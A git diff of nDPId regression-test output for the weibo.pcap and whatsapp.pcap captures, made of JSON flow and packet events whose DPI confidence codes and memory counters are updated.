00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -219,11 +218,11 @@ 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -233,10 +232,10 @@ 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-payload-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1463089073893} +00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-payload-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":238,"global_ts_msec":1463089073893} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 498/498 ~~ skipped flows.............: 0 @@ -245,9 +244,9 @@ ~~ total active/idle flows...: 44/44 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5933508 bytes -~~ total memory freed........: 5933508 bytes -~~ total allocations/frees...: 118826/118826 +~~ total memory allocated....: 6067142 bytes +~~ total memory freed........: 6067142 bytes +~~ total allocations/frees...: 121588/121588 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 1029 chars diff --git a/test/results/whatsapp.pcap.out b/test/results/whatsapp.pcap.out index 035b66f80..28827fecd 100644 --- a/test/results/whatsapp.pcap.out +++ b/test/results/whatsapp.pcap.out @@ -4,578 +4,578 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655030801747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655030801747,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ABpAAD8GAijAqAJkszzDMa8EFGbkDT9OAAAAAKAC\/\/\/IawAAAgQFtAQCCArFapnmAAAAAAEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655030801776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655030801776,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ABtAAD8GAi\/AqAJkszzDMa8EFGbkDT9PTyfQe4AQAKy6dAAAAQEICsVqmgM2ROYE"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655030801861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655030801861,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ABxAAD8GAirAqAJkszzDMa8EFGbkDT9PTyfQe4AYAKx0zgAAAQEICsVqmlg2ROYERUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655030801747,"flow_last_seen":1655030801890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655030801890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655030801747,"flow_last_seen":1655030801890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655030801890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1537,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1655031983762} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655031983762,"flow_last_seen":1655031983762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655031983762,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 